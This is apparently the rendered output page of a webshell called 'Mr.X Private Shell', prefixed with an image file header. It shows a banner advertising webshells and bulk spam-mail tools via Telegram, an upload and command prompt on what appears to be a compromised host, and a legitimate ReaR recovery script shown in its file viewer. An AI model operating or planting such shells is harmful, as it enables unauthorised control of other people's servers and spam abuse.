����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
is_true "$PORTABLE" && return

# In the ReaR rescue/recovery system the only possible workflows are
# - 'recover' and its partial workflows 'layoutonly' 'restoreonly' 'finalizeonly'
# - 'mountonly'
# - 'opaladmin'
# - 'shell'
# - 'help'
# cf. https://github.com/rear/rear/issues/719
# and https://github.com/rear/rear/issues/987
# and https://github.com/rear/rear/issues/1088
# and https://github.com/rear/rear/issues/3170#issuecomment-1981222992
# and https://github.com/rear/rear/issues/1901
# In particular in the normal/original system the workflows
# recover layoutonly restoreonly finalizeonly and mountonly
# must not run because they can destroy the original system
# cf. https://github.com/rear/rear/issues/2387#issuecomment-626303944
# In the ReaR rescue/recovery system /etc/rear-release is unique (it does not exist otherwise):
if test -f /etc/rear-release ; then
    # We are in the ReaR rescue/recovery system:
    case "$WORKFLOW" in
        (recover|layoutonly|restoreonly|finalizeonly|mountonly|opaladmin|shell|dump|help)
            LogPrint "Running workflow $WORKFLOW within the ReaR rescue/recovery system"
            ;;
        (*)
            Error "The workflow $WORKFLOW is not supported in the ReaR rescue/recovery system,${LF}use --portable to disable this check at your own risk.${LF}ReaR will probably not work as expected and potentially${LF}destroy your backup data,${LF}if you run these workflows in the rescue system!"
            ;;
    esac
else
    # We are in the normal/original system:
    case "$WORKFLOW" in
        (recover|layoutonly|restoreonly|finalizeonly|mountonly)
            Error "The workflow $WORKFLOW is only supported in the ReaR rescue/recovery system,${LF}use --portable to disable this check at your own risk.${LF}ReaR will destroy your system if you run these workflows in the normal/original system!"
            ;;
        (*)
            LogPrint "Running workflow $WORKFLOW on the normal/original system"
            ;;
    esac
fi

Filemanager

Name Type Size Permission Actions
001_verify_config_arrays.sh File 1.47 KB 0644
002_check_rear_recover_mode.sh File 1.95 KB 0644
010_EFISTUB_check.sh File 368 B 0644
010_set_drlm_env.sh File 135 B 0644
030_update_recovery_system.sh File 2.66 KB 0644
100_check_stale_nfs_mounts.sh File 1.15 KB 0644
950_check_missing_programs.sh File 1.93 KB 0644
998_dump_variables.sh File 1.08 KB 0644